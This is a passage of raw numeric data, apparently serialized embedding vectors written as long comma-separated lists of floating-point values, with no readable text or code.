18,-0.009532289,-0.025376936,-0.0027987775,0.02221039,0.025792122,0.00069791975,0.016254667,-0.0059663933,0.012631178,0.014676904,-0.01027805,0.035571013,-0.00028516658,-0.0092370305,0.0026095093,0.012216403,-0.029511224,-0.01653787,0.030922828,0.0014616195,0.030423071,-0.019042984,-0.0041455533,0.017303333,-0.00003257195,-0.027490472,-0.008646896,-0.013521315,-0.0053751813,-0.021179743,0.010836379,0.020641115,-0.013226335,0.0020127497,0.016671872,-0.0026302207,0.012656481,-0.025974588,0.024535332,0.006026387,0.012379152,0.041719466,0.0038293463,-0.0054479996,-0.009370627,-0.0007699951,0.0010327762,-0.02130879,0.01499579,-0.0005006354,-0.008115274,0.003756168,0.023403462,-0.01891943,-0.021593267,0.0089199,-0.010014103,0.001735663,-0.0048249075,0.023661435,0.017007312,-0.0028148652,0.0038164943,-0.004818887,0.009373331,0.029335115,0.0030612801,0.004294623,0.010976546,0.0009604155,0.024028992,-0.011963647,0.0074443207,-0.018837411,-0.024060404,-0.009480432,0.021607924,0.014971932,-0.0032488555,0.0040437737,-0.008431647,-0.016541122,-0.0013245525,-0.032056592,0.018744705,0.006332469,0.037115276,0.014337689,0.021226922,0.002003488,0.011273756,-0.01138143,0.0035863556,-0.017659398,-0.028685682,-0.017502861,-0.004579837,0.015300304,0.04094665,-0.009586629,-0.0069809314,-0.009187193,-0.023671437,0.0049224608,0.01148326,0.018279685,-0.012239636,-0.0017342356,-0.0004726856,0.016084628,-0.006526331,-0.0038653803,-0.00083093374,-0.0017596858,-0.0013400576,0.000097606484,0.015808286,-0.03966103,-0.0057640313,0.004190849,-0.00059474295,-0.0030588317,-0.026770348,-0.0131950565,-0.009225517,0.0097471755,-0.012278226,-0.011076529,0.00381227,0.015119264,0.00078758475,-0.004766755,-0.031294227,-0.035909772,0.026261425,0.0054566944,0.009961024,-0.0024228985,0.0008042599,-0.01840187,0.0022952403,-0.017075155,-0.025129206,0.0105240755,-0.000990365,-0.0130995205,0.016492696,-0.021965027,-0.0052171443,0.0052561853,-0.00094329787,-0.008281336,0.016859546,-0.023259161,0.017188683,0.008346136,0.0018631876,0.008798682,0.018358128,-0.0054053282,-0.019284159,-0.0058881547,0.016250847,-0.008795067,-0.006797362,0.0033798981,0.09981026,0.022453636,-0.021693574,0.004225799,-0.007337036,0.0043122293,0.027273474,0.010946613,0.008272149,0.02231774,-0.0020050472,-0.00899713,0.021855306,-0.017982421,-0.0076965163,0.029051896,0.012589006,0.005781147,0.008157738,-0.004679434,0.005736378,-0.022321694,-0.017258326,0.03942846,0.019204509,-0.054080453,0.019105088,0.046679046,-0.0048478036,0.010457982,0.022329375,0.018067908,-0.008229603,0.0051238304,-0.012315295,-0.009637432,0.031866904,-0.01631517,-0.006574577,-0.035159506,0.01033444,0.031252325,-0.014925409,-0.012856549,-0.026618814,-0.0066942386,-0.009080277,-0.0076838844,-0.008911038,-0.006582683,0.011393097,0.010217133,-0.0028645447,-0.00021928381,0.004006832,-0.017021976,-0.0054982794,-0.010599545,-0.001665516,-0.006224608,0.020482251,-0.00032279617,-0.009565552,0.009734537,-0.008038856,0.021748083,-0.020250946,-0.012314196,-0.03707355,-0.019805634,0.031428773,-0.012867429,0.01864782,0.014469331,-0.007996392,0.034316417,-0.010178133,-0.019713342,-0.007064725,-0.006302474,0.009657862,0.0177153,0.022410965,0.006286026,0.031633224,0.0066531426,-0.0052955537,-0.007925166,0.019267222,-0.005041266,0.026363846,0.0052318443,0.008077624,0.02086368,-0.023329597,0.0014332447,0.029036779,-0.025084486,-0.000989677,0.021601113,0.009342261,0.010965205,-0.004909837,-0.004445177,-0.01264259,-0.015066872,0.0029769514,0.017171694,0.008371569,-0.0077712033,0.017558014,-0.0011307439,-0.011504206,0.013791086,0.013324013,-0.009964001,-0.0017550455,-0.01448501,0.0040424895,-0.009993375,0.002045485,0.009477137,0.0046738638,0.025049359,-0.0040650927,0.011618908,-0.009291972,0.0081286505,-0.0067499806,0.000013184846,0.0076111783,-0.03456502,0.0033435174,-0.014668864,0.00011327952,0.014182698,0.029291589,-0.0010589795,0.01663401,-0.024443628,0.006196559,0.004709504,0.005350061,0.00455285,-0.0023953412,-0.0040108445,0.020341467,-0.007248515,-0.0025967055,-0.00518561,-0.025560023,-0.0033794073,0.011584402,0.00037219506,-0.0113342395,-0.009539486,0.031514667,-0.0047137183,0.002477945,-0.012197873,0.013523163,-0.010843287,0.008732614,-0.029098475,0.005514529,-0.00020919474,-0.0077991067,0.00977456,0.006624037,0.025936406,-0.0087434035,-0.00016992853,-0.0018136539,0.01270645,-0.006507887,0.007458429,0.0060752304,0.01262974,-0.0053346045,0.012235557,0.013902606,0.024082834,-0.020163188,0.021700831,-0.009751625,-0.011213181,0.007884045,0.021865524,0.0056294473,0.02310362,-0.03379555,0.03116138,-0.001492232,0.01661008,-0.00023706708,0.0070909383,-0.04099473,0.046612095,-0.0154881105,-0.04407389,-0.0078037065,-0.0022007069,0.0056178616,-0.009020913,0.019578302,-0.005826225,0.016117029,-0.0011890286,-0.0011492076,-0.00070418185,-0.02118318,-0.0071141273,-0.014056441,-0.0073798997,-0.00976214,-0.006620695,-0.02613075,-0.015497776,-0.016634583,0.018227953,-0.005093066,-0.0049583805,-0.0257782,0.012983212,-0.01236167,-0.020355025,-0.020803196,0.03235318,-0.0013367777,0.00031301976,-0.0025388063,-0.00210882,-0.023558034,-0.0057059187,-0.0035561246,-0.0014292966,0.0066630878,0.015547999,-0.0025096803,0.00026654638,0.008939879,0.0002576083,-0.0062969276,0.005926034,-0.030100357,-0.011321103,0.024895245,-0.0081979735,-0.013993936,-0.039705373,-0.033995237,0.000008227398,-0.026815146,-0.012660143,-0.051191732,0.0031686574,-0.0047106873,0.030406862,-0.0029178087,0.0027109727,-0.003939304,0.018223388,-0.007476587,0.03418865,0.020910103,-0.012397954,0.030238725,-0.023520036,-0.021411901,-0.01847846,-0.018659383,-0.003937325,-0.020699404,-0.006328057,-0.025196306,0.008195169,-0.021398965,-0.0030469128,-0.014503572,0.03913602,-0.003911238,-0.015734548,0.025787428,-0.023986708,0.0032777344,-0.029668365,0.022206351,0.018130997,0.048223138,-0.05547588,-0.009663919,0.03316018,-0.0028687692,-0.014218368,0.007973924,-0.016371127,-0.09615404,-0.026237793,0.021228043,-0.0071582743,-0.000052173546,-0.052129008,0.009734886,0.019150335,-0.013476211,-0.005669965,0.00969089,0.014034413,0.00046277398,0.019215599,-0.0054342663,0.0012085112,0.003002004,-0.01720764,-0.012483054,-0.015644746,-0.0030214244,0.0029779237,-0.0148468185,0.018718172,0.015947875,0.0054187714,0.01386887,-0.02225676,0.009109125,-0.01176911,-0.01157106,-0.016796226,-0.024468936,-0.012704026,0.02703031,0.01151279,0.008531274,-0.02911821,0.002051825,0.0032634805,-0.013965275,0.12516001,0.015382981,-0.007256616,-0.026264858,0.010270306,-0.03234531,0.005616236,0.0056732465,-0.015674528,0.015576804,-0.004670178,-0.010447964,0.019103266,0.008032478,0.0012120536,-0.0052407472,-0.013132714,0.122207046,0.01165843,0.025106076,-0.00009064031,-0.007143632,0.02284355,0.019511903,-0.0033118743,-0.011928816,0.0035454796,-0.038590893,0.029994382,-0.0039122426,0.011580693,0.011053382,0.011007448,-0.016550543,-0.003622533,0.0042718826,-0.018634565,-0.0012361571,-0.030677646,0.0058472943,0.01028905,-0.017810777,0.0026299448,-0.015044625,-0.0012112757,0.0046927473,-0.001691357,-0.00067955523,-0.015311352,0.029270582,-0.003982184,-0.03228722,0.016511925,0.0006659165,-0.010147068,-0.0199678,0.0024917906,-0.0077596544,-0.009499609,0.032056343,0.027182197,-0.006044064,-0.00046473573,0.009674256,-0.028729213,0.0016826995,-0.00070825947,0.008987348,-0.007135485,-0.0046510147,-0.0035642788,0.0037783277,-0.020533863,-0.0026759908,0.036915194,-0.013668956,-0.016676866,0.00035147398,0.010162207,-0.01831386,0.022546556,0.03775047,-0.012502335,0.0023438113,-0.0000024864792,0.0028977352,0.0036914593,-0.0002492628,-0.008133961,0.017940652,-0.0016811277,-0.0052926275,0.004338847,-0.014100846,-0.0055589075,0.006489544,-0.0048442604,-0.0060999766,0.00033867557,-0.016497897,-0.022231514,0.010451004,0.012223166,-0.00038952727,-0.0031430102,0.0063495734,0.0024919803,0.007234525,-0.009133301,0.004089594,0.018743852,0.016239503,-0.012404595,-0.0021420065,-0.014332795,-0.0057691988,0.03143989,0.009802536,-0.03898377,0.017629202,-0.0122292405,-0.014793159,0.021414375,-0.0068195025,-0.019556802,0.007309275,0.0134448465,-0.022877997,-0.021976445,0.00087765284,-0.0092542395,-0.023240918,0.015350862,0.025572412,-0.0010827155,-0.019427132,0.0015080026,-0.026898531,-0.0035651897,-0.008647861,0.018979302,0.014933905,-0.0032599315,-0.01068075,-0.020044228,-0.004588739,0.03032278,-0.0024714428],[-0.0057728365,-0.006271239,0.012963212,-0.008341501,0.005626467,-0.0025601338,-0.013359989,0.026279053,0.017019263,-0.0019154866,0.006952871,0.02110204,-0.015855534,-0.007818775,0.0034198118,0.014479924,0.010544055,-0.0071902066,0.00049627956,-0.0005890906,0.002973153,-0.021052642,0.0055966745,0.019191379,0.009256008,0.005962498,-0.006877519,-0.010689763,-0.018606437,0.0004183286,0.016256396,0.022888394,-0.008123705,-0.0070524197,0.0021650824,0.014804362,-0.0015598169,-0.004754165,0.0100837555,-0.0020124444,0.018777685,0.015846344,-0.015704988,0.022108164,-0.01907007,0.0023135121,0.002537849,-0.005425084,-0.016703967,0.0037081386,-0.0056632897,0.0020931754,-0.0026050466,0.03331781,-0.008484293,0.008483807,-0.009777122,-0.025777373,0.0060188044,-0.0050545624,-0.0011816373,0.007297571,0.00018670106,-0.00089170324,0.038363464,-0.010475346,0.0024275815,-0.008210964,-0.012610526,-0.013838808,0.01673177,-0.018888181,-0.0107594365,-0.007210675,-0.020308394,0.027975913,0.0013108643,0.00831585,-0.006218847,-0.00016602824,-0.032008097,0.010408386,-0.0012929584,-0.004638834,0.015814696,-0.0071747643,-0.004556374,-0.0077599296,-0.011281379,0.0007304745,-0.030006943,0.015507909,0.0047390284,0.0034111037,0.0226524,0.01943417,0.025149181,-0.0050564352,-0.0072381618,-0.0047485637,-0.011336998,-0.0036288998,-0.0069253133,0.0059754425,0.0026144234,-0.01504594,-0.01633978,-0.012393207,0.0011589483,0.017492471,-0.009218544,-0.0047139684,0.0015189943,-0.0067378962,0.0136588495,-0.016239742,-0.003361891,0.012427402,-0.0018720288,0.009126122,-0.00196657,-0.0017370543,0.006255967,0.0063493894,-0.010716506,-0.011131875,0.0033400557,0.0012627394,-0.0055433977,-0.017725118,-0.011866916,0.022604113,-0.018044524,0.0015749335,0.019219099,0.005276187,0.0018689266,0.0023854512,0.019882053,-0.012525031,-0.0060640075,0.013627287,0.020041024,0.007849469,0.010246956,-0.010819429,-0.008873734,0.019118635,0.013747801,0.012157554,0.010936808,-0.009218392,-0.006659986,-0.0009690142,0.001233635,0.005925505,-0.0124656195,-0.023279663,-0.0130634485,0.0170561,-0.008092145,-0.0021331478,0.016078448,0.017636893,0.00018867242,-0.0008372243,0.010850845,0.0078276135,-0.012673963,-0.032643963,0.01973905,0.01181145,0.026088964,0.004526571,0.0067235534,-0.017290015,0.009709099,-0.005208874,-0.0084573245,0.0058768117,-0.009615459,0.01883365,-0.014283702,0.00056330004,0.0016912513,0.013429792,0.01865735,0.029417146,-0.0076815845,-0.0052732085,-0.0019741505,0.005706408,0.0005342488,0.011594962,-0.022076625,-0.025086861,-0.0060945065,0.13543339,-0.0009402832,-0.011748376,-0.009389842,-0.014200819,0.0010075604,-0.0149975,-0.010351984,-0.025381701,-0.012824076,-0.0003229025,0.0005725383,-0.0040299674,0.011102747,-0.014365082,0.02233028,0.007523242,0.012203736,-0.07671318,-0.008793852,0.0365662,-0.021225046,-0.0014603132,0.010629978,-0.0027067063,-0.0034592482,0.00042607795,-0.034842163,0.0050727166,0.029349374,-0.0053138803,-0.0029147924,-0.035811964,0.02333995,0.014646668,-0.053624097,-0.014078757,-0.01700998,-0.029494584,0.015499709,-0.0026625306,0.010528708,-0.005623612,-0.0064857323,-0.010921833,0.009413354,0.014198612,-0.019840349,0.010478408,0.0071541397,0.010080675,0.0046566906,0.003626059,0.007355678,-0.02528252,0.010898129,0.028988618,-0.009506471,0.004673406,0.0052892314,0.0027441778,0.004207035,0.004783775,0.02779655,0.04689924,-0.024106309,0.04417627,0.026765166,0.0065588444,0.013613102,-0.034276765,-0.00945487,0.0004810551,-0.041972756,0.012398908,-0.005857459,-0.014907776,0.02205156,-0.008272411,0.024491904,0.011472803,0.015057505,0.0035816794,-0.0017853586,0.01099962,-0.004926308,-0.028732691,-0.03516221,-0.014289945,0.018627468,0.012560603,0.010958247,-0.02055112,-0.021396728,-0.0006160522,0.026984328,-0.0016630541,0.015613287,-0.011349217,-0.028468076,0.025477927,0.011903149,-0.007218548,-0.0042451923,-0.0007974633,0.023485346,0.009219832,-0.0052993586,0.0063977833,-0.000007758069,0.0149064,0.008928246,0.0015095981,-0.004279256,0.0024067156,0.0016020226,0.0012939575,0.00880634,0.0030294308,-0.0058242953,-0.0063532903,0.0073409188,0.0053333677,0.02257743,-0.015269527,-0.0009322235,0.0082650725,-0.01036782,-0.014571783,0.028818531,0.011819543,0.000121762416,0.009186662,-0.0026255525,0.004805829,-0.0028838788,0.00849202,-0.006389582,-0.0004192534,0.005208577,0.021806536,-0.01046348,0.024664013,-0.007152705,0.012881681,-0.017042834,-0.003871029,0.0051996377,0.00053262163,0.0075626583,0.0006559293,0.021063777,0.010873011,-0.004176065,0.01372523,-0.019913897,0.0018451273,0.0051088063,-0.004938239,-0.013524398,-0.014475247,-0.0238969,-0.012081536,0.025132062,-0.018229865,0.009122285,-0.0155578675,0.05237538,-0.01642493,-0.01129899,-0.006629179,-0.017280152,-0.026116055,0.01680997,0.024038604,-0.009778103,-0.010845021,-0.026604343,-0.018726518,-0.006297608,0.03609536,-0.010281338,0.013759957,-0.014645482,0.024050292,0.002430689,-0.022026448,0.020376332,-0.008120421,-0.02368896,0.007222726,0.022384405,0.020058142,-0.0010661656,-0.0012462182,-0.0038273484,-0.015631419,-0.0061625666,-0.014693147,-0.0148516735,-0.00060511555,-0.019742789,0.018858336,0.007340977,0.012221978,-0.007502184,0.02253791,-0.017444473,0.011935882,-0.007574218,0.019636106,-0.008212357,0.015431808,0.020652879,-0.0013685431,0.0018310245,-0.002405724,0.012774829,0.0028778072,-0.011073462,0.015087052,0.007830331,0.0072426377,0.01262307,-0.016529854,0.010972466,0.025235042,0.024911176,0.02229723,-0.025065623,0.016317876,-0.0029196288,0.027454294,0.0062865224,-0.008345746,0.008170174,0.012378878,-0.013753151,0.020666571,0.011515799,0.01522684,-0.01674525,-0.010110817,-0.02216619,-0.01547463,0.004049956,0.008268898,0.004730093,0.008119133,-0.0028457665,0.013956081,-0.025690358,-0.0049647116,0.018271793,-0.0032247268,0.004508522,-0.012801579,0.016736489,-0.014518087,0.029320363,-0.0046101604,0.03476382,0.008212206,0.029512553,0.0032474038,0.00079731207,0.025743201,-0.010121844,0.016302895,0.0030200246,-0.014668028,0.004179819,0.008111676,-0.00039959038,-0.013077838,0.0060300487,0.01842282,-0.0016530898,-0.008509446,-0.007836387,-0.006230699,-0.012729136,-0.0035376868,0.0067099677,-0.020929582,0.00094693154,0.027167004,0.03541553,-0.026100716,0.00444261,0.018309178,-0.00395021,0.015585875,-0.0033539883,-0.021387555,0.008071612,0.008818186,0.023629602,0.0366102,0.008884414,-0.04499093,-0.0077264262,0.008713218,-0.00091294874,-0.011004656,0.041414537,-0.00029286204,0.026071584,0.0031023365,0.023416685,0.008469097,-0.0032802538,0.0075994018,-0.0036234963,-0.0016504475,0.023677547,-0.00079554174,0.015737716,0.004577521,0.009791562,-0.014360339,-0.0068948306,0.005415381,-0.0033004896,-0.01679957,-0.03098813,-0.008418733,0.033324983,-0.036125682,0.0038470088,-0.022373278,-0.0018536978,-0.0019460452,0.016110472,0.069551684,-0.0038759422,-0.033352908,-0.011905264,0.021011649,0.016935699,-0.018488696,0.0074790823,-0.009407964,0.03755538,-0.0073958924,0.012307546,0.012386292,0.040140923,-0.02903947,-0.0018210482,-0.002881033,0.0025812264,-0.013103139,0.0017996911,0.021753898,0.0043637548,-0.01516992,-0.019008594,-0.02140402,-0.019163685,0.041033342,0.0076270634,0.006753555,0.019218186,-0.011875117,0.010479349,-0.000010675493,-0.0047714673,0.0077183056,-0.008778615,-0.011021222,-0.0034723682,-0.008383856,0.019438881,0.024628218,-0.0038085824,-0.005220563,0.0269056,0.014690836,-0.009270445,-0.012309446,0.01241495,0.0006673585,-0.016336488,-0.016369868,0.0027375997,0.031317413,-0.008110833,-0.008774934,-0.0053091063,0.0017646383,0.019463902,-0.02376245,0.0034411626,0.0066901804,-0.00010085622,-0.012250455,-0.01717528,-0.005497997,-0.0032699401,-0.00016623002,-0.01069325,0.0024867414,-0.02889225,0.03334723,0.0014154512,0.004246871,0.001487486,0.00584652,0.010122754,0.010247858,0.009507338,0.015062541,-0.022037314,-0.0056892424,0.0149772875,-0.00031286286,-0.014301892,0.0061016306,0.0024035955,-0.020247923,-0.004045954,0.026659157,-0.02688616,0.00061917666,-0.006318593,0.0011458889,0.0016030588,0.010291357,0.018933117,-0.0044968594,0.009840726,0.003106453,-0.0018563592,-0.006128639,-0.03818948,-0.022509713,0.04090457,-0.0050987946,0.009093162,-0.013985112,-0.0031367429,0.0068212533,-0.025776166,0.019966904,-0.07860086,0.016868254,0.026742524,0.02596531,-0.014944854,0.0374324,-0.025615495,0.01194889,0.00003437829,-0.035977524,-0.01480779,-0.005727773,0.027873019,0.016594145,0.01926775,-0.008188234,-0.020722566,-0.029139051,0.0018463247,-0.057042044,0.0007010155,0.025213517,-0.010456493,0.007856789,0.0027545195,-0.0028565242,-0.0032869114,0.0006904154,0.012875165,-0.01687177,0.031436287,0.02266416,0.018518249,-0.0031474675,0.0056172446,-0.013298607,-0.012393713,-0.0047352673,-0.008537615,0.00039146404,0.0010888585,-0.014186058,-0.014086209,0.008199428,-0.0058993306,0.017579203,-0.031891778,0.00524898,-0.016247492,0.013780937,0.0121878525,-0.0014736248,-0.005371562,-0.0011763654,0.009077741,0.008878595,-0.009024157,0.01909308,-0.010207317,-0.010087709,-0.017768532,0.0145185795,0.00014530079,-0.0102179535,0.024383275,0.02798005,0.027828945,-0.0076889363,-0.0036166592,0.011446512,0.0063162507,0.021220503,0.011560147,0.010280236,0.01874397,0.012593085,0.009509322,-0.0013133978,-0.004823072,-0.0069324025,0.003036139,-0.018899022,-0.0029565098,0.007975376,0.007286993,-0.019789496,0.019289086,-0.024016296,0.016400367,-0.008363225,0.0050976295,0.013725444,-0.00934226,-0.0019242606,-0.002366653,0.0054646,-0.0036091886,-0.024007414,-0.016892811,0.033305526,0.01748711,0.011085097,-0.005229495,-0.02329353,-0.009905574,0.0022378895,-0.008941782,-0.02843573,-0.021469792,0.027289312,-0.024390224,0.034844782,0.005264769,0.0009209263,0.004537032,0.030898126,-0.0035046698,0.00517241,-0.0017623545,-0.00784539,0.017262995,0.023918834,0.022926249,-0.0061918157,-0.0035415187,0.013893964,-0.0030697293,0.0009147181,0.010838598,-0.0011365184,0.028286796,0.0034680695,-0.008655436,0.022919813,-0.014361503,-0.030596348,0.015526769,-0.033992834,-0.006830606,-0.014056966,-0.015142587,-0.0024647035,0.014630353,0.0054086954,0.02965081,0.0151758175,0.029621068,0.0006063157,-0.005779674,0.013138971,0.017966527,-0.016988184,-0.0052596936,-0.02485943,-0.018271351,0.027241955,-0.009243522,0.00028638015,0.00036600904,-0.01931265,-0.012368707,-0.015214766,0.0019553804,-0.009311518,-0.010584933,-0.0047921166,-0.029538507,0.021129025,-0.0053799246,0.01182251,0.006738758,0.012045983,-0.008187393,0.0013446609,-0.00257252,-0.032172542,-0.01890415,0.003392566,0.0039674435,0.0051461817,0.00048174293,-0.016047737,-0.034832783,0.003032637,-0.01061514,0.015586158,0.018351033,-0.023413787,0.022978622,-0.0012360174,0.0054013934,0.013028916,0.0034680609,-0.042873517,-0.008098916,-0.013477757,-0.003937586,0.04162685,0.0158625,-0.0046432586,0.032554302,-0.00094236893,-0.0122066615,0.004810207,-0.019137757,-0.018385395,-0.011097446,-0.008061033,-0.0070991544,-0.027610684,0.013009489,-0.008614115,0.016329551,-0.0070851655,0.019702876,0.0012937965,-0.005956602,-0.029238202,-0.011562691,0.021246735,0.01309445,0.0016065122,-0.009991557,-0.004951951,0.0030538286,-0.016789656,-0.0023195574,0.011564043,-0.010538245,0.009826311,0.005528832,0.007839263,-0.012474888,-0.030173138,0.007919817,-0.010204733,0.015511413,-0.0043150475,-0.009793786,0.015929805,0.012527715,0.02584336,-0.026792578,0.011996984,-0.019776186,-0.013255526,0.008380013,-0.009865611,-0.019814907,-0.018184293,-0.0026281036,-0.04280366,0.009064303,-0.021655967,-0.0028521921,0.0073368535,-0.015147495,0.009632717,0.0055438387,-0.01316077,0.025115142,0.018195262,0.0030922561,-0.004025432,0.0016471449,0.0009208954,0.0020031275,0.008552021,0.003492904,0.042697746,0.004524627,0.032067034,-0.01394715,0.01942287,-0.015136989,0.004064379,-0.018181438,-0.019210268,0.01731433,-0.0044785533,-0.011117599,0.035688877,0.027443685,-0.004780712,0.011276558,-0.021147517,-0.007270536,0.024408536,-0.009833663,-0.011419844,-0.008743483,0.009799189,0.010605353,-0.008435214,0.008941375,-0.018458853,-0.056056105,0.019189086,0.026355874,0.009577758,-0.015177145,0.023188863,-0.021557381,-0.0010223312,0.031065704,-0.0066143223,-0.0056330813,0.0003570862,-0.019130412,-0.012659331,0.023120543,-0.0171576,-0.01318236,0.0037294896,0.020078467,-0.0073017534,-0.03799682,0.004022358,0.016740765,0.012883553,0.011405166,-0.020983016,0.008443012,0.007505566,-0.023901619,-0.0011681865,0.01146889,0.00791633,0.019850256,-0.0067102103,-0.0055313236,-0.015303299,0.00739141,0.010369951,-0.011837426,-0.010511506,-0.019503152,0.0011369849,-0.018482383,0.032009833,-0.0123449955,-0.006379377,0.0012519166,-0.002706175,-0.015755514,-0.009433656,0.017942306,0.004918982,-0.008624544,0.01630139,0.0037838777,0.013837629,0.0022540302,-0.00015098727,0.015183714,-0.0046808477,0.009663954,0.0011600628,-0.0027097259,0.015484819,-0.024964634,-0.006456482,-0.00048882887,-0.0017397021,0.008454821,0.003519054,-0.015891157,0.0063744867,-0.0061024646,0.0057652006,-0.0053481283,0.020305138,0.0061313375,-0.0064740186,-0.006225772,-0.012951633,-0.0006664782,-0.0030241518,-0.020241538,-0.0016354616,-0.016760059,0.017195554,-0.0076609743,0.0054084244,-0.0029696138,-0.024955528,0.011846117,-0.0020917815,0.0006180356,0.00010888319,-0.014104172,0.014098592,0.0018938998,0.010897221,-0.0017597324,-0.0043307,0.023919657,-0.015503256,-0.011949711,0.031307492,-0.02115295,0.00046081722,-0.015505847,-0.020313382,0.015222301,0.021707602,0.0038213984,0.031107195,0.014718167,0.0024533274,0.018923713,-0.010253798,-0.006084366,0.017906852,0.04352865,-0.003654258,-0.005588074,-0.00961931,0.010660149,0.015345046,-0.014000763,0.007020551,0.012822598,-0.013744541,-0.024032872,0.022267893,-0.0016671643,0.020295402,-0.0047380184,0.008785585,0.0023470235,-0.017668571,-0.011166196,-0.008696071,-0.015125883,0.005925875,-0.007451494,-0.01686489,-0.034992,0.0062594768,0.00047914323,0.0018292954,-0.015185501,0.005132046,-0.000966816,0.0073272716,0.0049330518,-0.009386409,0.0018025864,-0.00896776,-0.009498322,-0.0018585374,-0.0045700064,-0.0140396105,0.0058594695,0.011008447,-0.008736976,-0.030198438,-0.003518139,-0.00020210688,-0.031030314,-0.010656768,-0.009677912,0.018097019,-0.01048684,-0.016827682,0.0082712285,-0.0054439725,-0.028434731,0.02996973,0.010524781,-0.011895399,0.029891914,-0.013052671,-0.006644059,0.0043693553,0.008283116,-0.0030973474,-0.010362597,0.015682269,0.02395721,-0.019689644,-0.002683498,-0.006758103,-0.00908585,-0.013601929,-0.006737024,0.0023633025,-0.012455223,0.017008167,-0.005429443,0.008440352,0.012310627,0.004514292,0.00027437854,0.004913793,-0.034503143,0.013306343,0.0027354453,0.00604382,-0.02378851,-0.0043124873,0.005852443,0.0031738912,-0.009168685,-0.020840947,-0.010345897,-0.010226893,-0.0028051895,0.009050396,0.0022594582,-0.00805009,-0.006513892,0.020399798,0.024006352,0.0041851406,0.02482919,-0.0046017263,0.017630558,0.0025305704,-0.00067137164,-0.0139843635,0.006123465,0.0048348624,0.011311301,-0.013638412,0.009994217,-0.027506374,0.024197754,0.0049575916,-0.016212044,0.022495598,-0.023708433,-0.0016959541,-0.0027095098,-0.025227202,0.003911431,0.0070957625,0.008577821,0.017457735,-0.0016708643,0.041029975,0.012143098,-0.0017819366,0.006369413,0.006872641,-0.012484045,0.0072418097,0.004543885,-0.016778689,-0.016196001,-0.0093088765,-0.0042841947,-0.011544986,-0.005935888,-0.0021425367,-0.00040543784,-0.01570205,-0.010298999,0.016151324,0.00067529443,0.009313316,0.01747932,0.014656165,0.0066298763,-0.00010527833,0.011391183,-0.0046567707,0.008781569,-0.006539123,-0.014550388,-0.007602913,-0.007144246,0.020382857,0.014396499,0.004504207,0.0032361578,-0.0071958695,0.01753655,-0.02196689,0.012878361,0.008364902,-0.007436422,-0.014363953,0.028691411,0.002717937,0.013397954,0.017018246,0.0053424584,0.014834957,0.011707672,-0.008907408,0.007940947,0.0057178265,0.012014125,-0.01374796,-0.021214938,-0.013793544,-0.007956422,-0.036420006,0.013554542,-0.021959338,0.0093499245,0.0031068483,0.012262735,0.0055965493,-0.014429612,-0.024775,0.008728841,-0.04206597,-0.001052796,0.0059162863,0.006063782,0.000520643,-0.015885288,0.00578953,0.0010923931,0.013264179,-0.006623723,0.020025393,0.004711444,0.046487454,-0.0029555755,0.01553179,-0.017079407,0.0026959586,-0.017604599,0.0065133385,0.0020821688,0.0075760465,-0.00007377177,0.001730769,0.011542147,-0.012210174,-0.020003054,0.004005073,0.0072414316,-0.017234458,0.075869165,-0.008320884,0.011610261,0.005688166,-0.0058189062,0.012314252,0.015213328,-0.022229768,0.02318335,-0.0026698334,-0.011387111,0.0012048169,-0.0057834946,0.020149497,-0.0055651916,0.016551426,0.00085220573,0.0065655364,0.0105052395,-0.021146063,0.005125533,0.0031608625,-0.010539162,-0.00094285957,0.0044991216,-0.00979541,0.008481909,-0.031041197,0.00025561126,0.004852205,-0.0089725945,-0.022651216,0.0130388895,-0.0035835016,0.023725223,-0.015564235,-0.0027253872,-0.0025586528,-0.011803697,-0.02529357,0.025347147,0.0010679124,-0.010374871,0.0046160207,0.007918815,-0.010565765,0.08743517,0.011214269,0.037042283,0.0011152528,0.005201308,0.01412459,-0.0068927375,0.017999694,0.0068051275,-0.0031833865,0.015235286,0.003671688,-0.009969483,0.0046774778,0.01101533,-0.008434316,-0.0071315328,0.010083829,0.017033199,-0.027152536,0.006156235,0.010025418,0.008684153,-0.017659338,-0.0033837561,0.027118295,-0.013420621,0.019855924,0.027307052,-0.0033376461,-0.004896713,-0.0011989012,0.016930858,0.019859837,0.014325329,-0.07212811,0.009385088,0.19212034,-0.010217232,0.012743805,0.0040065926,-0.0068725594,-0.003065478,-0.09022033,0.007400866,-0.018793656,-0.012272594,-0.012823734,-0.015606415,-0.01297516,0.032184064,0.011686212,0.01556688,0.0062486813,-0.038286645,0.024015866,-0.016549626,0.015133218,-0.002532305,-0.00040615047,0.02146951,-0.03013846,-0.0064704083,0.018354544,-0.020831537,-0.0143384505,0.0034976627,0.004879569,-0.0014407474,0.009856708,0.00186102,-0.017757853,0.010696014,0.0134630585,-0.0004036963,0.0057172896,-0.020626156,0.007856299,0.014905649,-0.026510997,-0.02307776,-0.16833346,-0.012132864,0.014521827,-0.020096008,0.017901754,0.0015032835,0.016613858,-0.021765398,-0.0030330648,-0.030620616,-0.004493825,-0.0036174639,-0.022041062,0.020154973,0.0012692185,0.0021074913,0.0005725988,0.0059583834,0.004557501,-0.0012885601,0.05526378,0.0056147724,-0.013104783,-0.019768976,-0.008490622,-0.013016375,-0.03137437,0.020814538,-0.0065171956,0.007964761,-0.0069432515,0.030268464,-0.0048752706,0.010890152,-0.011522006,-0.030035324,-0.021485059,0.0047812564,-0.019465439,-0.00007477213,0.014185136,-0.005433156,-0.003952766,0.009984638,-0.004128996,0.027875148,-0.00040356524,0.0146492915,0.0006605117,0.016918477,0.025071912,0.0076624295,-0.028208734,-0.008409096,-0.008776921,0.0058957837,-0.0071517467,-0.022453425,-0.02160024,0.014325201,-0.009120495,-0.0025652312,-0.01225069,-0.009929101,0.017328987,0.010996368,0.006625734,-0.024598485,-0.006522442,-0.017775565,0.0034746798,0.011703188,0.023504948,-0.018575711,0.0005494449,0.0050357506,-0.010522621,-0.01534619,0.0027676525,-0.015289805,-0.02538571,-0.019370934,0.0139060225,-0.015369027,0.0048502865,-0.001195677,0.0031989429,-0.024151808,0.01689564,0.0023855378,0.0123315165,-0.0008641246,0.037685737,0.012067654,-0.011951096,0.0015937595,0.017853972,-0.0033724888,-0.043238554,0.02551538,-0.0040840064,-0.0017691538,-0.033040877,0.0026423351,-0.02372192,0.013189526,-0.003770962,-0.007647062,-0.011136629,0.0032966307,-0.020474069,-0.0030950136,0.017689701,-0.004331922,-0.013105117,-0.04453028,0.0020952572,0.012678401,0.003695201,-0.0029447814,-0.026570857,0.000021594902,-0.0143970745,-0.0025106657,0.022651544,0.0036358922,-0.02097443,0.000050911978,0.011788753,-0.017626608,-0.005891391,0.0016194865,-0.0069364537,-0.0019562966,-0.002329723,0.02189976,-0.018403808,-0.016807212,-0.030715387,-0.0075142113,0.010596646,-0.026228111,0.0038914848,-0.010465351,0.03026,